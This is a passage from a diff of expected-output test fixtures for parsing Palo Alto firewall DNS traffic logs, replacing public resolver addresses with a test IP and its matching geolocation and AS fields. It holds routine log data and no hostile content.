16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9791,27 +9886,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 179, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -9830,7 +9927,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9845,7 +9942,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9867,7 +9964,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:po/vy4RoD5WeFPgCZnduQkE47yY=" + "community_id": "1:WZDvBFVegIhMMGv+nhAyDd8fRs0=" } }, "sequence_number": 32091171, @@ -9887,8 +9984,8 @@ ], "network": { "community_id": [ - "1:RM5edUgZPywM/hIejzFVba+A4co=", - "1:po/vy4RoD5WeFPgCZnduQkE47yY=" + "1:SePV/IDh1jjVyN5T4udJ8C1xa+I=", + "1:WZDvBFVegIhMMGv+nhAyDd8fRs0=" ], "transport": "udp", "application": "dns", 
@@ -9928,14 +10025,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941998818Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031746900Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9958,27 +10055,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 218, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -9997,7 +10096,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -10012,7 +10111,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -10034,7 +10133,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:wIxYOe++IxscmxBcRwrPGEIlZF4=" + "community_id": "1:qcxcaTpyWF+yTo0gacaLCRvVTdc=" } }, "sequence_number": 32091172, @@ -10054,8 +10153,8 @@ ], "network": { "community_id": [ - "1:jJo7FJWI3gHbC96nTsyT17hVP98=", - "1:wIxYOe++IxscmxBcRwrPGEIlZF4=" + "1:p7bJDKhUeffJiJ7yfQZH2E44Dvs=", + "1:qcxcaTpyWF+yTo0gacaLCRvVTdc=" ], "transport": "udp", "application": "dns", 
@@ -10095,14 +10194,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942002305Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031754Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -10125,27 +10224,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 172, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -10164,7 +10265,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -10179,7 +10280,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -10201,7 +10302,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:xN7R3QI47jVAQhgJrOAvdsu+oes=" + "community_id": "1:JR/9wbsZU1i/WfnfKXg/pJ74JRA=" } }, "sequence_number": 32091173, @@ -10221,8 +10322,8 @@ ], "network": { "community_id": [ - "1:eWhg/7DfJGJNfW90sKt5WEYnI9g=", - "1:xN7R3QI47jVAQhgJrOAvdsu+oes=" + "1:o5e7XAcaqhJxDKgm/3IDk32KJeg=", + "1:JR/9wbsZU1i/WfnfKXg/pJ74JRA=" ], "transport": "udp", "application": "dns", 
@@ -10262,14 +10363,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942005759Z",
- "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031759600Z",
+ "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -10292,27 +10393,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 305,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -10331,7 +10434,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -10346,7 +10449,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -10368,7 +10471,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:BxuDgAhR5Rh55XOXYnYF+6GKhps="
+ "community_id": "1:Bc4xJ7lD1NlCA/3AmAVsQNYES64="
 }
 },
 "sequence_number": 32091174,
@@ -10388,8 +10491,8 @@
 ],
 "network": {
 "community_id": [
- "1:dhAcAsMUxJrHfinQA5Q7eglS7T0=",
- "1:BxuDgAhR5Rh55XOXYnYF+6GKhps="
+ "1:h1oeveqcJzaFWRZabjDssyQizPo=",
+ "1:Bc4xJ7lD1NlCA/3AmAVsQNYES64="
 ],
 "transport": "udp",
 "application": "dns",
@@ -10429,14 +10532,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942009218Z",
- "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031765100Z",
+ "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -10459,30 +10562,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "66.28.0.45"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-MD",
- "city_name": "Lanham",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Maryland",
+ "region_name": "Jilin",
 "location": {
- "lon": -76.8388,
- "lat": 38.9705
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 174,
+ "number": 4837,
 "organization": {
- "name": "Cogent Communications"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 527,
- "ip": "66.28.0.45",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -10501,7 +10603,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -10516,7 +10618,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "66.28.0.45"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -10538,7 +10640,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:Yv+Yq/7HK9SajeKHOV50RYQWjRU="
+ "community_id": "1:BpTv1ACuUpncoNdGoG2X6a0Xa00="
 }
 },
 "sequence_number": 32091175,
@@ -10558,8 +10660,8 @@
 ],
 "network": {
 "community_id": [
- "1:4i/owhGS2IpySKH+SyV4sXRj0+A=",
- "1:Yv+Yq/7HK9SajeKHOV50RYQWjRU="
+ "1:7scQlMKp1W6Pm/fWCG6Ym+msKzM=",
+ "1:BpTv1ACuUpncoNdGoG2X6a0Xa00="
 ],
 "transport": "udp",
 "application": "dns",
@@ -10599,14 +10701,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "66.28.0.45",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942012714Z",
- "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031770500Z",
+ "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:47.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -10629,27 +10731,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 153,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -10668,7 +10772,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -10683,7 +10787,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -10705,7 +10809,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:MxVcaRP5Y1xyEiYiNsmO1lVcN+A="
+ "community_id": "1:BOB9wtAfwP5+6JDPoEYJazGGY1w="
 }
 },
 "sequence_number": 32091176,
@@ -10725,8 +10829,8 @@
 ],
 "network": {
 "community_id": [
- "1:KZzZcwEN4cbaTck1z2Wa/3P3YjU=",
- "1:MxVcaRP5Y1xyEiYiNsmO1lVcN+A="
+ "1:n7na652DSILYNbdII1evSRQ59uI=",
+ "1:BOB9wtAfwP5+6JDPoEYJazGGY1w="
 ],
 "transport": "udp",
 "application": "dns",
@@ -10766,14 +10870,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942016234Z",
- "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031775900Z",
+ "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:47.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -10796,27 +10900,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 169,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -10835,7 +10941,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -10850,7 +10956,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -10872,7 +10978,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:p8DU1xLXG63f/3s/r6ZKJcQo9u8="
+ "community_id": "1:TgKht4IY3bXV7bhl2uE8yxyTVxc="
 }
 },
 "sequence_number": 32091177,
@@ -10892,8 +10998,8 @@
 ],
 "network": {
 "community_id": [
- "1:LJ6ZkdUI9SYHDvi3B2Yn/9ILMbM=",
- "1:p8DU1xLXG63f/3s/r6ZKJcQo9u8="
+ "1:YkPur+uarfYMTJuYRe5QYRrH/es=",
+ "1:TgKht4IY3bXV7bhl2uE8yxyTVxc="
 ],
 "transport": "udp",
 "application": "dns",
@@ -10933,14 +11039,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.942019749Z",
- "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031781300Z",
+ "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:47.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -10963,27 +11069,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
